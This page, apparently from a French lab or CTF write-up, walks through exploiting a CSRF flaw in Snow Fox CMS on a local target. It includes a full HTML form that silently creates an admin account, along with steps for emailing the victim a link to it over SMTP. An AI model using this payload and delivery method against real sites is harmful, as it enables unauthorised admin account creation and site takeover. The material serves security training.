SSRF (email) - Pentesting Web

Vulnérabilité CSRF:

Recherche sur SearchExploit pour le CMS Snow Fox, qui révèle une vulnérabilité CSRF.

Fichier HTML Vulnérable :

<html>
  <body>
    <form action="http://casino-royale.local/vip-client-portfolios/?uri=admin/accounts/create" method="POST">
      <input type="hidden" name="emailAddress" value="[email protected]" />
      <input type="hidden" name="verifiedEmail" value="verified" />
      <input type="hidden" name="username" value="jordan-admin" />
      <input type="hidden" name="newPassword" value="jordan-password" />
      <input type="hidden" name="confirmPassword" value="jordan-password" />
      <input type="hidden" name="userGroups[]" value="34" />
      <input type="hidden" name="userGroups[]" value="33" />
      <input type="hidden" name="memo" value="CSRFmemo" />
      <input type="hidden" name="status" value="1" />
      <input type="hidden" name="formAction" value="submit" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>

Tentative d'Attaque CSRF pour Créer un Compte Admin via Snow Fox CMS

Se connecter via telnet sur le port SMTP 25.

Envoyer un email à "[email protected]" avec le liens de notrre serveur python3 HTTP avec le fichier.html vulnérable.

Connexion avec le Compte Admin du CMS :

Tentative de connexion avec les nouveaux identifiants, résultant en la création d'un compte admin sur Snow Fox CMS.

Suite à l'exploitation de la vulnérabilité CSRF, un compte admin du CMS Snow Fox a été créé.

Identification d'une Piste dans la Description d'un Utilisateur

Dans la description d'un utilisateur du CMS, une piste supplémentaire indique un répertoires à suivre.

Mis à jour il y a 12 mois

Ce contenu vous a-t-il été utile ?